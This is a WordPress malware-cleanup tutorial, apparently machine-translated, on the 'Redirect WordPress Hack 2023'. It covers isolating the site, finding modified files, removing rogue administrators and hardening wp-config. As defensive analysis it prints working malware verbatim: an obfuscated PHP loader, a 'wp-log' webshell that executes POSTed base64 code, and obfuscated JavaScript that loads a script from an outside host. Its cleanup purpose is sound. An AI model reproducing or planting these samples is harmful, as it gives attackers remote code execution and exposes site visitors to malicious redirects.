WordPress is definitely the most used platform CMS (Content Management System) For both blogs and online Starter stores (with the WooCommerce module), which makes it the most targeted by computer attacks (hacking). One of the most used hacking operations aims to redirect the compromised website to other web pages. Redirect WordPress Hack 2023 is a relatively new malware that impacts to redirect the entire site to spam web pages or which in turn can viruses users computers.
content
If your site developed on WordPress is redirected on another site, then the victim is already the famous redirect hack.
In this tutorial you will find the necessary information and useful tips through which you can dismiss a website infected with redirect WordPress Hack (Virus Redirect). Through comments you can get additional information or ask for help.
Detection of virus that redirects WordPress sites
The sudden and unjustified decrease in traffic on the site, decrease the number of orders (in the case of online stores) or advertising receipts are the first signs that something is not right. Detection “Redirect WordPress Hack 2023” (Redirect virus) can be done and “visual” When opening the website and you are redirected to another web page.
From experience, most of the web malware applications are compatible with Internet browsers: Chrome, Firefox, Edge, Opera. If you are a Mac computer user, these viruses are not very visible in the Safari browser. The safari security system tacitly blocks these malicious scripts.
What do you need to do if you have a WordPress Hack Word Hack Virus website
I hope the first measure is not to panic or delete the website. Not even the virus or virus files should be deleted in the first phase. They contain valuable information that can help you understand where the security breach is and what the virus has affected. Modus operandi.
Close the website for the public.
How do you close a virus website for visitors? The simplest is to use the DNS manager and delete his IP for “A” (domain name) or define a non-existent IP. Thus, the visitors of the website will be protected from this redirect WordPress hack that can take them on virus or spam web pages.
If you use CloudFlare As DNS Manager, you authenticate in your account and delete the DNS records “A” for the domain name. Thus the area affected by the virus will remain without IP, not being able to be accessed from the Internet.
Copy the IP of the Website and do “route” to be able to access only you. From your computer.
How do you change the real IP of a website on Windows computers?
The method is often used to block access to certain websites by editing the file “hosts”.
1. Open Notepad or other text editor (with administrator rights) and edit the file “hosts“. It is located in:
C:\Windows\System32\drivers\etc\hosts2. In the file “hosts” add “route” to the real IP of your website. IP deleted above from DNS Manager.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Save the file and access the website in the browser.
If the website does not open and you did not make a mistake in the file “hosts”, most likely is a DNS cache.
To delete the DNS cache on a Windows operating system, open Command Prompt, where you execute the order:
ipconfig /flushdnsHow do you change the real IP of a website on Mac / MacBook computers?
For MAC computer users it is a little easier to change the real IP of a website.
1. Open the utility Terminal.
2. Perform the command line (requires the system password for execution):
sudo nano /etc/hosts3. As for Windows computers, add the real IP of the domain.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Save the changes. Ctrl+X (y).
After you have done “route”, you are the only person who can access the WordPress Hack Word Hack Virus website.
Full backup website – Files and database
Even if it is virus with “redirect WordPress hack”, the recommendation is to make a general backup of the entire website. Files and database. Possibly you could save a local copy of both files in public / public_html as well as the database.
Identification of virus and modified files of Redirect WordPress Hack 2023
The main target files of WordPress I am index.php (at the root), header.php, index.php and footer.php of the WordPress Active theme. Manually check these files and identify a malicid code or a malware script.
In 2023, a type virus “Redirect WordPress Hack” put in index.php a code of form:
(I do not recommend you execute these codes!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Decoded, this script malware It is practically the consequence of the WordPress website. It is not the script that is the basis of the malware application, but it is the script that makes it possible to redirect the virus web page. If we decode the script above, we get:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
As to indicate all the files on the server containing this code, it is good to have access SSH to the server to run the check -up and administration files on Linux.
Below are two commands that are certainly helpful to identify recently modified files and files containing a particular code (string).
How do you see the PHP files modified in the last 24 hours or in another time range on Linux?
Command “find” It is very simple to use and allows personalization to set the time period, the patch in which the search and type of files are done.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"In Output you will receive information about the date and time at which the file was modified, writing / reading / execution permits (chmod) and whose group / user belongs.
If you want to check several days ago, change the value “-mtime -1” or use “-mmin -360” for minutes (6 hours).
How are you looking for a code (string) inside PHP files, Java?
Command line “find” through which you can quickly find all PHP or Java files containing a particular code is as follows:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Order will search and display files .php and .js containing “uJjBRODYsU“.
With the help of the two orders above you will find very easily which files have been modified lately and contain malware code.
Removes the malware from the modified files without compromising the correct code. In my scenario, the malware code was placed before the opening <head>.
At the execution of the first order “find” It is very possible to discover new files on the server, which are not WordPress or put there. Files that are proclaiming the WordPress Hack Redirect Virus.
In the scenario investigated by me, the form files appeared on the server “wp-log-nOXdgD.php“. These are files “generation” which also contain malware code used by the redirect virus.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Purpose of type files “wp-log-*” It is to spread the Redirect Hack virus and other websites hosted on the server. Is a type malware code “webshell” composed of one basic section (in which some encrypted variables are defined) and o execution section by which the attacker tries to load and execute a malware code in the system.
If there is a variable POST called ‘bh‘ and its encrypted value MD5 is equal to “8f1f964a4b4d8d1ac3f0386693d28d03“, then the script seems to write the encrypted content base64 of another variable called ‘b3‘ in a temporary file and then try to include this temporary file.
If there is a variable POST or GET called ‘tick'The script will respond with the value MD5 of the string “885“.
To identify all the files on the server containing this code, choose a string that is common, then execute the command of “find” (similar to the above). Delete all files containing this malware code.
Security breach operated by Redirect WordPress Hack
Most likely this redirect virus reaches through Wordpress administration user exploitation or by identifying a vulnerable plugin which allows the addition of users with administrator privileges.
For most websites built on the WordPress platform is possible Editing themes of themes or pluginto the administration interface (Dashboard). Thus, a malicious person can add in the files of the theme malware that generates the scripts presented above.
An example of such malware is this:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript identified in the WordPress theme header, immediately after opening the label <head>.
It is quite difficult to decrypt this javascript, but it is obvious that another web address is most likely to bring other scripts to create files “wp-log-*” about which I talked above.
Search and delete this code from all files PHP affected.
As far as I could figure out this code was manually added by a new user with administrative privileges.
So, to prevent the addition of malware in Dashboard, it is best to disable the WordPress / Plugins in Dashboard.
Edit the file wp-config.php and add the lines:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);After you make this change, no WordPress user will be able to edit Dashboard files.
Check users with administrator's role
Below is a SQL query you can use to search users with administrator in the WordPress platform:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'This query will return all users in the table wp_users who attributed the role of administrator. The query is done for the table wp_usermeta to search in meta ‘wp_capabilities', Which contains information about the roles of users.
Another method is to identify them from: Dashboard → Users → All Users → Administrator. But I am practicing a user can be hidden in the Dashboard panel. So the best way to see users “Administrator” Wordpress is the SQL command above.
In my case, I identified in the database the user with the name “wp-import-user“. Quite suggestive.
From here you can see the date and time when the WordPress user was created. The user of the user is also very important because he was looking in the server logs. This way you can see all the activity of this user.
Delete users with administrator's role that you do not know, then Change your passwords to all administrative users. Editor, Author, Administrator.
Change SQL user's password to the database of the affected website.
After taking these steps, the website can be restarted for all users.
Remember, however, that what I presented above is one of the thousands of spit by which a website is with redirect WordPress Hack in 2023.
If your website has been virus and need help or if you have any concerns, the comment box is open.
